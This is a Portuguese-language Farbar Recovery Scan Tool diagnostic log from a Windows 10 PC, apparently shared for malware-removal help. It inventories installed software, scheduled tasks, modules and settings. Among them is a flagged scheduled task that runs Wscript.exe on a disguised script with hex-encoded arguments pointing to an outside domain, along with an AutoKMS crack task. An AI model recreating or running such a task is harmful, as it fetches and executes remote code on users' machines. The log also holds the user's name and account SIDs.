Resultado do exame Adicional Farbar Recovery Scan Tool (x64) Versão: 31-08-2016 Executado por rafael (04-09-2016 19:35:17) Executando a partir de C:\Users\gabri\Desktop Windows 10 Pro Versão 1607 (X64) (2016-08-07 16:54:35) Modo da Inicialização: Normal ========================================================== ==================== Contas: ============================= Administrador (S-1-5-21-4085003843-1987285651-1473373783-500 - Administrator - Disabled) Convidado (S-1-5-21-4085003843-1987285651-1473373783-501 - Limited - Disabled) DefaultAccount (S-1-5-21-4085003843-1987285651-1473373783-503 - Limited - Disabled) rafael (S-1-5-21-4085003843-1987285651-1473373783-1001 - Administrator - Enabled) => C:\Users\gabri ==================== Central de Segurança ======================== (Se uma entrada for incluída na fixlist, será removida.) AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Programas Instalados ====================== (Somente os programas adwares com a indicação "Oculto" podem ser adicionados à fixlist para desocultá-los. Os programas adwares devem ser desinstalados manualmente.) µTorrent (HKU\S-1-5-21-4085003843-1987285651-1473373783-1001\...\uTorrent) (Version: 3.4.8.42449 - BitTorrent Inc.) 4500_G510af_Help (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden 4500G510af (x32 Version: 140.0.001.000 - Hewlett-Packard) Hidden 4500G510af_Software_Min (x32 Version: 140.0.001.000 - Hewlett-Packard) Hidden 64 Bit HP CIO Components Installer (Version: 7.2.8 - Hewlett-Packard) Hidden Akamai NetSession Interface (HKU\S-1-5-21-4085003843-1987285651-1473373783-1001\...\Akamai) (Version: - Akamai Technologies, Inc) Ansel (Version: 372.70 - NVIDIA Corporation) Hidden ASUS Smart Gesture (HKLM-x32\...\{4D3286A6-F6AB-498A-82A4-E4F040529F3D}) (Version: 4.0.5 - ASUS) Autodesk Advanced Material Library Image Library 2016 (HKLM-x32\...\{94AD53E7-493B-4291-8714-7A3B761D2783}) (Version: 6.3.0.15 - Autodesk) Autodesk Material Library 2016 (HKLM-x32\...\{29A7D6EC-63C2-42FD-8143-5812ABD2923F}) (Version: 6.3.0.15 - Autodesk) Autodesk Material Library Base Resolution Image Library 2016 (HKLM-x32\...\{6B4CFC6E-ECB0-47FE-95D3-65C680ED0687}) (Version: 6.3.0.15 - Autodesk) Bing Powered Search (HKLM-x32\...\BingPoweredSearch) (Version: - ) BS.Player FREE (HKLM-x32\...\BSPlayerf) (Version: 2.70.1080 - AB Team, d.o.o.) BufferChm (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden Counter-Strike Global Offensive WaRzOnE (HKU\S-1-5-21-4085003843-1987285651-1473373783-1001\...\CSGO) (Version: - CS WaRzOnE) DocProc (x32 Version: 140.0.185.000 - Hewlett-Packard) Hidden ELAN Touchpad 11.15.0.14_X64 (HKLM\...\Elantech) (Version: 11.15.0.14 - ELAN Microelectronic Corp.) Emergency Download Driver (HKLM-x32\...\{3F0F5AB4-C9CE-4226-8393-E9CFF8369D9D}) (Version: 1.1.16.1526 - Microsoft) Fallout New Vegas Ultimate Edition version 1.4.0.525 (HKLM-x32\...\Fallout New Vegas Ultimate Edition_is1) (Version: 1.4.0.525 - Mr DJ) Foxit Cloud (HKLM-x32\...\{41914D8B-9D6E-4764-A1F9-BC43FB6782C1}_is1) (Version: 3.7.135.908 - Foxit Software Inc.) Foxit Reader (HKLM-x32\...\Foxit Reader_is1) (Version: 7.2.0.722 - Foxit Software Inc.) Geeks3D FurMark 1.17.0.0 (HKLM-x32\...\{2397CAD4-2263-4CD0-96BE-E43A980B9C9A}_is1) (Version: - Geeks3D) GPBaseService2 (x32 Version: 140.0.297.000 - Hewlett-Packard) Hidden GPU Caps Viewer 1.23.0.2 (HKLM-x32\...\{F6E04BE8-2FA4-44C4-9BD3-142CE3EB15B4}_is1) (Version: - Geeks3D.com) HP Officejet 4500 G510a-f 14.0 Rel. 6 (HKLM\...\{A49C5804-8F24-433C-99B2-9F9F541090C7}) (Version: 14.0 - HP) HP Solution Center 14.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 14.0 - HP) HPPhotoGadget (x32 Version: 140.0.524.000 - Hewlett-Packard) Hidden HPProductAssistant (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden HPSSupply (x32 Version: 140.0.297.000 - Hewlett-Packard) Hidden Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.4276 - Intel Corporation) jetAudio Basic (HKLM-x32\...\{DF8195AF-8E6F-4487-A0EE-196F7E3F4B8A}) (Version: 8.1.0 - COWON) K-Lite Codec Pack 11.3.6 Full (HKLM-x32\...\KLiteCodecPack_is1) (Version: 11.3.6 - ) Maxthon Cloud Browser (HKLM-x32\...\Maxthon3) (Version: 4.9.3.1000 - Maxthon International Limited) Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation) Microsoft Office 2003 Web Components (HKLM-x32\...\{90120000-00A4-0409-0000-0000000FF1CE}) (Version: 12.0.6213.1000 - Microsoft Corporation) Microsoft Office Professional Plus 2013 (HKLM\...\Office15.PROPLUS) (Version: 15.0.4569.1506 - Microsoft Corporation) Microsoft OneNote 2013 (HKLM\...\Office15.ONENOTER) (Version: 15.0.4569.1506 - Microsoft Corporation) Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50428.0 - Microsoft Corporation) Microsoft SQL Server 2008 Native Client (HKLM\...\{C79A7EAB-9D6F-4072-8A6D-F8F54957CD93}) (Version: 10.0.1600.22 - Microsoft Corporation) Microsoft SQL Server 2008 Setup Support Files (HKLM\...\{B40EE88B-400A-4266-A17B-E3DE64E94431}) (Version: 10.1.2731.0 - Microsoft Corporation) Microsoft SQL Server 2012 (64-bit) (HKLM\...\Microsoft SQL Server SQLServer2012) (Version: - Microsoft Corporation) Microsoft SQL Server 2012 Native Client (HKLM\...\{49D665A2-4C2A-476E-9AB8-FCC425F526FC}) (Version: 11.0.2100.60 - Microsoft Corporation) Microsoft SQL Server 2012 Setup (English) (HKLM\...\{5DDC2234-4B37-45BC-AD33-41F1469B4D83}) (Version: 11.0.2100.60 - Microsoft Corporation) Microsoft SQL Server 2012 Transact-SQL ScriptDom (HKLM\...\{0E8670B8-3965-4930-ADA6-570348B67153}) (Version: 11.0.2100.60 - Microsoft Corporation) Microsoft Visio Professional 2013 (HKLM\...\Office15.VISPROR) (Version: 15.0.4569.1506 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual Studio 2005 Remote Debugger Light (x64) - ENU (HKLM\...\Microsoft Visual Studio 2005 Remote Debugger Light (x64) - ENU) (Version: - Microsoft Corporation) Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation) Microsoft VSS Writer for SQL Server 2012 (HKLM\...\{3E0DD83F-BE4C-4478-86A0-AD0D79D1353E}) (Version: 11.0.2100.60 - Microsoft Corporation) Mozilla Firefox 47.0.1 (x86 pt-BR) (HKLM-x32\...\Mozilla Firefox 47.0.1 (x86 pt-BR)) (Version: 47.0.1 - Mozilla) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 47.0.1.6018 - Mozilla) MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation) No Man's Sky (HKLM-x32\...\1446213994_is1) (Version: 2.0.0.2 - GOG.com) No Man's Sky Pre-order DLC (HKLM-x32\...\2022706229_is1) (Version: 2.0.0.2 - GOG.com) Nokia PC Internet Access (HKLM-x32\...\Nokia PC Internet Access) (Version: 2.0.2.2 - Nokia) Nokia PC Internet Access (x32 Version: 2.0.2.2 - Nokia) Hidden NVIDIA GeForce Experience 2.11.4.0 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.11.4.0 - NVIDIA Corporation) NVIDIA Graphics Driver 372.70 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 372.70 - NVIDIA Corporation) NVIDIA Software do sistema PhysX 9.16.0318 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation) OCR Software by I.R.I.S. 14.0 (HKLM\...\HPOCR) (Version: 14.0 - HP) Outils de vérification linguistique 2013 de Microsoft Office - Français (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden Pacote de Driver do Windows - ASUS (ATP) Mouse (06/17/2015 1.0.0.262) (HKLM\...\14588A15B66655338DBCC021FFA81E31DC281859) (Version: 06/17/2015 1.0.0.262 - ASUS) Pacote de Idiomas do Microsoft Visual Studio 2010 Tools for Office Runtime (x64) - Português (Brasil) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - PTB) (Version: 10.0.50903 - Microsoft Corporation) PowerISO (HKLM-x32\...\PowerISO) (Version: 6.6 - Power Software Ltd) Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.10.714.2016 - Realtek) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7535 - Realtek Semiconductor Corp.) Revisores de Texto do Microsoft Office 2013 – Português do Brasil (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden Scan (x32 Version: 140.0.253.000 - Hewlett-Packard) Hidden Secure Download Manager (HKLM-x32\...\{F0858165-B8DB-4347-89B8-6D9F882B9BF3}) (Version: 3.1.60 - Kivuto Solutions Inc.) Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{D82063A8-7C8C-4C3B-A9BB-95138CA55D26}) (Version: - Microsoft) Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (HKLM\...\{91150000-0051-0000-1000-0000000FF1CE}_Office15.VISPROR_{F0C12872-B60D-4E37-A2F9-20C46A5E1F1A}) (Version: - Microsoft) Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (HKLM\...\{91150000-00A1-0000-1000-0000000FF1CE}_Office15.ONENOTER_{D82063A8-7C8C-4C3B-A9BB-95138CA55D26}) (Version: - Microsoft) Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (Version: - Microsoft) Hidden SHIELD Streaming (Version: 7.1.0280 - NVIDIA Corporation) Hidden SHIELD Wireless Controller Driver (Version: 2.11.4.0 - NVIDIA Corporation) Hidden Shop for HP Supplies (HKLM\...\Shop for HP Supplies) (Version: 14.0 - HP) Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.3.0.9150 - Microsoft Corporation) Skype™ 7.7 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.7.103 - Skype Technologies S.A.) SolutionCenter (x32 Version: 140.0.299.000 - Hewlett-Packard) Hidden SQL Server 2012 Common Files (Version: 11.0.2100.60 - Microsoft Corporation) Hidden SQL Server 2012 Database Engine Services (Version: 11.0.2100.60 - Microsoft Corporation) Hidden SQL Server 2012 Database Engine Shared (Version: 11.0.2100.60 - Microsoft Corporation) Hidden SQL Server Browser for SQL Server 2012 (HKLM-x32\...\{4B9E6EB0-0EED-4E74-9479-F982C3254F71}) (Version: 11.0.2100.60 - Microsoft Corporation) Sql Server Customer Experience Improvement Program (Version: 11.0.2100.60 - Microsoft Corporation) Hidden Switch Sound File Converter (HKLM-x32\...\Switch) (Version: 5.06 - NCH Software) TechPowerUp GPU-Z (HKLM-x32\...\TechPowerUp GPU-Z) (Version: - TechPowerUp) Toolbox (x32 Version: 140.0.596.000 - Hewlett-Packard) Hidden Update for Skype for Business 2015 (KB3039776) 64-Bit Edition (HKLM\...\{90150000-012B-0409-1000-0000000FF1CE}_Office15.PROPLUS_{0FA8AE0C-69AE-4F60-A1AB-F79C6BA5A999}) (Version: - Microsoft) USB Serial Port Driver (HKLM-x32\...\{FE11883D-EA67-473C-BDD1-8D6B6DFCBEAC}) (Version: 1.1.8.1526 - Microsoft) Vulkan Run Time Libraries 1.0.11.1 (HKLM\...\VulkanRT1.0.11.1-2) (Version: 1.0.11.1 - LunarG, Inc.) Vulkan Run Time Libraries 1.0.11.1 (Version: 1.0.11.1 - LunarG, Inc.) Hidden Warsaw 1.12.4.14 64 bits (HKLM\...\{20E60725-16C8-4FB9-8BC2-AF92C5F8D06D}_is1) (Version: 1.12.4.14 - GAS Tecnologia) WebReg (x32 Version: 140.0.297.017 - Hewlett-Packard) Hidden WinRAR 5.21 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH) WinUsb CoInstallers (HKLM-x32\...\{9755918A-CDF8-4F1E-8453-6359CF1A330A}) (Version: 1.1.12.1526 - Microsoft) WinUSB Compatible ID Drivers (HKLM-x32\...\{A4A0B236-6046-4CAB-8177-1EAF61112C75}) (Version: 1.1.11.1526 - Microsoft) WinUSB Drivers ext (HKLM-x32\...\{B7F55FF1-607A-4E12-BF64-8770BC618D12}) (Version: 1.1.23.1526 - Microsoft) ==================== Exame Personalizado CLSID (Whitelisted): ========================== (Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.) CustomCLSID: HKU\S-1-5-21-4085003843-1987285651-1473373783-1001_Classes\CLSID\{0B628DE4-07AD-4284-81CA-5B439F67C5E6}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2016\acad.exe /Automation => Nenhum Arquivo CustomCLSID: HKU\S-1-5-21-4085003843-1987285651-1473373783-1001_Classes\CLSID\{149DD748-EA85-45A6-93C5-AC50D0260C98}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2016\acad.exe => Nenhum Arquivo CustomCLSID: HKU\S-1-5-21-4085003843-1987285651-1473373783-1001_Classes\CLSID\{5370C727-1451-4700-A960-77630950AF6D}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2016\acad.exe /Automation => Nenhum Arquivo CustomCLSID: HKU\S-1-5-21-4085003843-1987285651-1473373783-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\gabri\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\FileCoAuth.exe (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-4085003843-1987285651-1473373783-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.exe (Intel Corporation) CustomCLSID: HKU\S-1-5-21-4085003843-1987285651-1473373783-1001_Classes\CLSID\{E2C40589-DE61-11ce-BAE0-0020AF6D7005}\InprocServer32 -> C:\Program Files\Autodesk\AutoCAD 2016\en-US\acadficn.dll => Nenhum Arquivo ==================== Tarefas Agendadas (Whitelisted) ============= (Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.) Task: {20B6C91A-A200-45D7-8C3B-ACB054A7DF39} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\gabri\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe [2016-08-22] (Microsoft Corporation) Task: {232F203B-1299-4568-87DF-E62A339CA260} - System32\Tasks\RtHDVBg_ListenToDevice => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2015-08-07] (Realtek Semiconductor) Task: {30F0A62D-F2D2-49C4-B1A1-1E20A5273FB3} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-08-10] (Microsoft Corporation) Task: {5DE65750-A1E5-4E34-B419-73166D08B4F2} - System32\Tasks\Driver Booster Beta SkipUAC (gabri) => C:\Program Files (x86)\IObit\Driver Booster Beta\DriverBooster.exe Task: {7645CF61-E0A3-4002-9632-50F61BCDD11B} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [2014-01-23] (Microsoft Corporation) Task: {8B0EADF4-DBA9-4E06-BFA8-AD6E005BB3E5} - System32\Tasks\{7A293573-E403-E6B5-A79D-3A6CD5BA8850} => C:\Users\gabri\AppData\Local\{5A9D6~1\Updater.exe [2013-04-09] () <==== ATENÇÃO Task: {A0D444E0-28E6-4738-9634-200BB96A883F} - \GenericSettingsHandler\Windows-Credentials\RetrySyncTask_for_S-1-5-21-4085003843-1987285651-1473373783-1001 -> Nenhum Arquivo <==== ATENÇÃO Task: {AE0E0B23-8B34-4F8E-9DAD-8BAEC6A66BD0} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-23] (Microsoft Corporation) Task: {B123DC9E-77CF-4736-91B5-132F04950492} - System32\Tasks\Maxthon Update => C:\Program Files (x86)\Maxthon\Bin\MxEidolon.exe [2016-06-12] (Maxthon MxEidolo) Task: {B40E9650-FF88-483E-B750-BFA952DB5E34} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-23] (Microsoft Corporation) Task: {BF2FF39C-FD4B-4E59-A359-DC421F56A2F8} - System32\Tasks\Bing Powered Search sasir => Wscript.exe "C:\ProgramData\{12D0D7B3-9892-5D75-1E54-C337841648F9}\naca.txt" "687474703a2f2f79786870612e636f6d" "433a5c50726f6772616d446174615c7b31324430443742332d393839322d354437352d314535342d4333333738343136343846397d5c746574696c61" "433a5c50726f6772616d446174615c7b31324430443742332d393839322d354437352d314535 (a entrada de dados tem 78 mais caracteres). Task: {C4523C41-B540-4859-8A6D-B3111050D928} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe [2015-08-21] () Task: {CC8CCCA9-8491-4A83-B631-1273271D881A} - System32\Tasks\ASUS Smart Gesture Launcher => C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPLauncher.exe Task: {F463CCFB-AB7D-4710-86AE-6305F887BE9B} - System32\Tasks\RTKCPL => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [2015-08-07] (Realtek Semiconductor) (Se uma entrada for incluída na fixlist, o arquivo da tarefa (.job) será movido. O arquivo que está sendo executado pela tarefa não será movido.) Task: C:\WINDOWS\Tasks\Bing Powered Search sasir.job => Wscript.exe C:\ProgramData\{12D0D7B3-9892-5D75-1E54-C337841648F9}\naca.txt <==== ATENÇÃO Task: C:\WINDOWS\Tasks\{7A293573-E403-E6B5-A79D-3A6CD5BA8850}.job => ==================== Atalhos ============================= (As entradas podem ser listadas para serem restauradas ou removidas.) Shortcut: C:\Users\gabri\Favorites\NCH Software Download Site.lnk -> hxxp://www.nch.com.au/index.html ==================== Módulos Carregados (Whitelisted) ============== 2016-07-16 08:42 - 2016-07-16 08:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll 2016-07-16 08:42 - 2016-07-16 08:42 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll 2016-08-07 13:16 - 2016-08-25 18:12 - 00133056 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll 2016-06-30 18:28 - 2016-06-14 17:03 - 00367552 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\MessageBus.dll 2015-12-25 15:11 - 2016-06-14 17:03 - 00288192 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamBase.dll 2016-06-30 18:28 - 2016-06-14 17:03 - 03611584 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Poco.dll 2016-06-30 18:28 - 2016-06-14 17:03 - 01147328 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\libprotobuf.dll 2016-06-30 18:28 - 2016-06-14 17:03 - 01988544 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\NvPortForwardPlugin.dll 2016-06-30 18:28 - 2016-06-14 17:03 - 02665920 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\NvMdnsPlugin.dll 2016-06-30 18:28 - 2016-06-14 17:03 - 01840576 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\RtspPlugin.dll 2016-06-30 18:28 - 2016-06-14 17:03 - 00207296 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\RtspServer.dll 2016-06-30 18:28 - 2016-06-14 17:03 - 00920000 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_regex-vc120-mt-1_58.dll 2016-06-30 18:28 - 2016-06-14 17:03 - 00034240 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_system-vc120-mt-1_58.dll 2016-07-16 08:42 - 2016-07-16 08:42 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll 2016-08-22 23:39 - 2016-08-22 23:39 - 01864384 _____ () C:\Users\gabri\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\amd64\ClientTelemetry.dll 2016-06-14 13:37 - 2016-06-14 13:37 - 08909504 _____ () C:\Program Files\Microsoft Office\Office15\1033\GrooveIntlResource.dll 2015-08-19 16:32 - 2015-08-19 16:32 - 00110800 _____ () C:\Windows\Secure64.dll 2016-07-16 08:42 - 2016-07-16 08:42 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll 2016-07-16 08:43 - 2016-08-17 16:16 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll 2016-07-16 08:43 - 2016-08-24 00:54 - 09761280 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll 2016-08-25 23:56 - 2016-08-20 01:54 - 01401344 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll 2016-07-16 08:43 - 2016-08-24 00:54 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll 2016-07-16 08:43 - 2016-08-24 00:54 - 01033728 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll 2016-08-25 23:55 - 2016-08-20 01:54 - 02438144 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll 2016-08-25 23:56 - 2016-08-20 01:56 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll 2016-08-29 06:12 - 2016-08-29 06:12 - 00071168 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.7.113.0_x64__kzf8qxf38zg5c\SkypeHost.exe 2016-08-29 06:12 - 2016-08-29 06:12 - 00178176 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.7.113.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll 2016-08-29 06:12 - 2016-08-29 06:12 - 35288064 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.7.113.0_x64__kzf8qxf38zg5c\SkyWrap.dll 2015-08-19 16:32 - 2015-08-19 16:32 - 00116944 _____ () C:\Windows\Secure.dll 2015-08-08 01:06 - 2016-06-14 17:03 - 00018880 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll 2016-08-22 23:39 - 2016-08-22 23:39 - 01383616 _____ () C:\Users\gabri\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\ClientTelemetry.dll 2016-08-22 23:39 - 2016-08-22 23:39 - 00118976 _____ () C:\Users\gabri\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\FileSyncViews.dll 2016-06-14 13:38 - 2016-06-14 13:38 - 08909504 _____ () C:\Program Files (x86)\Microsoft Office\Office15\1033\GrooveIntlResource.dll ==================== Alternate Data Streams (Whitelisted) ========= (Se uma entrada for incluída na fixlist, somente o ADS será removido.) AlternateDataStreams: C:\Program Files (x86)\GbPlugin:IncompleteStartProcessProtection.cnt [10] AlternateDataStreams: C:\WINDOWS\system32\Drivers\gbpddfac64.sys:X5ZN8aGvT4 [2262] AlternateDataStreams: C:\WINDOWS\system32\Drivers\gbpddreg64.sys:X5ZN8aGvT4 [686] AlternateDataStreams: C:\WINDOWS\system32\Drivers\wsddfac.sys:X5ZN8aGXs4 [1198] AlternateDataStreams: C:\ProgramData\GbPlugin:IncompleteStartGbprcm.cnt [10] AlternateDataStreams: C:\Users\Todos os Usuários\GbPlugin:IncompleteStartGbprcm.cnt [10] ==================== Modo de Segurança (Whitelisted) =================== (Se uma entrada for incluída na fixlist, será removida do Registro. O valor "AlternateShell" será restaurado.) ==================== Associação (Whitelisted) =============== (Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido.) HKU\S-1-5-21-4085003843-1987285651-1473373783-1001\Software\Classes\.scr: AutoCADScriptFile => ==================== Internet Explorer confiável/restrito =============== (Se uma entrada for incluída na fixlist, será removida do Registro.) IE trusted site: HKU\S-1-5-21-4085003843-1987285651-1473373783-1001\...\bancobrasil.com.br -> www.bancobrasil.com.br IE trusted site: HKU\S-1-5-21-4085003843-1987285651-1473373783-1001\...\bb.com.br -> aapj.bb.com.br IE trusted site: HKU\S-1-5-21-4085003843-1987285651-1473373783-1001\...\gastecnologia.com.br -> cloud.gastecnologia.com.br ==================== Hosts Conteúdo: =============================== (Se necessário, a diretiva Hosts: pode ser incluída na fixlist para redefinir o Hosts.) 2015-07-10 08:04 - 2015-07-10 08:02 - 00000824 ____N C:\WINDOWS\system32\Drivers\etc\hosts ==================== Outras Áreas ============================ (Atualmente não há nenhuma correção automática para esta seção.) HKU\S-1-5-21-4085003843-1987285651-1473373783-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\gabri\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\16676012163_c43eca7d36_o.jpg DNS Servers: 201.17.128.77 - 201.17.128.72 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Firewall do Windows está habilitado. ==================== MSCONFIG/TASK MANAGER ítens desabilitados == (Atualmente não há nenhuma correção automática para esta seção.) 